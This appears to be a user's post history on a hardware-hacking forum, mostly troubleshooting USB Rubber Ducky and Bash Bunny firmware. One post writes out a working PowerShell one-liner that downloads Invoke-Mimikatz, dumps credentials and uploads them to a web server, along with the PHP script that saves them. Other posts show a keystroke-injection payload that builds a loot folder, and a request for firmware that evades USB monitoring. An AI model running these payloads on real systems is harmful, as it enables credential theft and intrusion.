TeCHemically


  1. You were right. That is the one I needed. Thanks so much!! 🙂
  2. Thank you for your reply! I believe the v2.1 firmware is a twin duck firmware. I am not able to use a twin duck in this situation. It must not be recognized as a USB drive or it will get noticed by monitoring software. The policies around USB drives are very strict in this client's environment. I need solely HID with no USB storage and with VID/PID changing support. Looks to be a twin duck f/w - UDC_DESC_STORAGE usb_dev_desc_t udc_device_desc; Not sure if I am reading that incorrectly. The source in one other firmware lists mass storage and HID injection in the comments at the top. I am unsure if that will be listed in all. I will try this one in the lab and report back. Thanks for your help!
  3. I attempted to flash the 1.0-stable firmware to test; and I am getting this error when I use the flash tool: "Can't load jvm.dll". I have the JDK and JRE path added to PATH; but I also placed the jvm.dll file from both the JRE and JDK paths (because I don't know which one I need) in the Duck Programming folder one at a time and tried to run the program.bat <firmware_file>.hex command. I still get the same "Can't load jvm.dll" error. That doesn't seem possible. Tried as user and a CMD window as admin. No change. My java is version 10. Do I need a specific older version? Installed Java JRE_8. This resolved the firmware flashing issue. All I need now is to know which f/w version I need to support vid/pid changing via the online tool kit created BIN file. I confirmed the 1.0-stable f/w does not support changing the VID/PID via the online created vidpid.bin.
  4. I found the other firmware images on the GitHub - https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Firmware/Images - Which one do I need to make the above vid/pid change functionality work?
  5. I am adding the vidpid.bin file to my sd card that was created by the online duck tool kit; but the vid / pid are not changed. The only version of the firmware on the hak5 download page is 1.0-stable from 2011. Does this version allow for vid/pid changing via the aforementioned method? Where did all of the other ducky firmware versions go and why aren't they available on the d/l page? I haven't used this ducky in a while; so, I'm a bit rusty. My scripts are working fine; but I do not know how to check what firmware I am on (I only know it is not twin duck). Any guidance on getting this device to change vid/pid according to the bin files I created with the online duck tool kit would be very helpful. Thanks!
  6. Thanks, yes it definitely is in arming mode; and this bunny came on the 1.3 firmware. I checked it before I ran the updater. The unbricking reset process doesn't work either. It never does anything other than boot into arming mode even after the plug in and unplug 3 times over at the beginning of that process.
  7. Thanks Just_a_User, I tried that and it is still skipping right over the firmware update as before :( I got excited by your response and was super hopeful that would do it. Thanks anyway :)
  8. OK, I am not sure why that formatting issue occurred and why it would not let me just paste the text in w/o making it such a mess. Sorry everyone, thanks to any who read it and reply!
  9. I received my replacement bashbunny yesterday and this new one will not perform the firmware update. Here is what I have tried so far: I have the sha checksum verified 1.4 firmware update file on the root of the storage partition and have plugged it into 2 different PCs (one linux and one windows); but it just mounts the storage and boots into arming mode normally. It totally skips the firmware update. I tried the f/w update on a third PC (windows) and it failed to start as well. I even tried the unbricking reset steps provided by Seb. The unbricking reset will not even start. I get no "police" flashing at all. Whenever the bunny is plugged in all it does is mount the storage partition. No reset or firmware update procedures ever begin. I tried to flash the 1.3 firmware as well to make sure it wasn't an issue with the firmware file itself. It just boots normally into arming mode completely bypassing the expected firmware update as it does with the 1.4 version. I also tried running the bunnyupdater version 1.0 and the newer 1.1; no change :(
  10. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  11. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above:
      powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"
      Here is the PHP script:
      <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?>
      It was broken up like this before; but didn't seem to have any effect (I know almost nothing of PHP; so this probably makes no difference):
      <?php
      $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
      file_put_contents($file, file_get_contents("php://input"));
      ?>
      Thanks to any who reply!
  12. Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  13. Well, I have some ok news and some great news guys. Firstly, thanks to all who assisted me in troubleshooting my issues with my bashbunny. The "ok news" is that I am not crazy, or just plain dumb in the head, and the bashbunny that I have is indeed defective. The "great news" is that Hak5, the kind folks that they are, have been able to verify my suspicions and are getting me a replacement device. Seriously, thanks again to all who helped me troubleshoot this device. I am sincerely grateful for all of your time and suggestions. I am looking forward to my bunny's arrival so I can get to work on the new payloads I have cooking up. I think I have a pretty nice recipe brewing here! :)
  14. Thanks for your reply. Yes, I am safely ejecting; and my AV is set to not interact with the drive letters that my externals mount to.
  15. Just tried to run my first payload after the reformat and it failed on the first operation where the payload creates a directory because it says the file system is corrupted. I even got it to unmount successfully after I put the payload on there before I ran it. If I open a powershell window and try to create the directory I get the same error. This is what fails:
      Q DELAY 6000
      Q GUI r
      Q DELAY 1000
      Q STRING POWERSHELL
      Q ENTER
      Q DELAY 1500
      Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
      Q ENTER
      Q DELAY 1500
      Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
      Q ENTER
      Q DELAY 1500
      Q STRING md \$LOOTDIR2\\
      Q ENTER
      Q DELAY 1000
      This is the command that fails:
      Q STRING md \$LOOTDIR2\\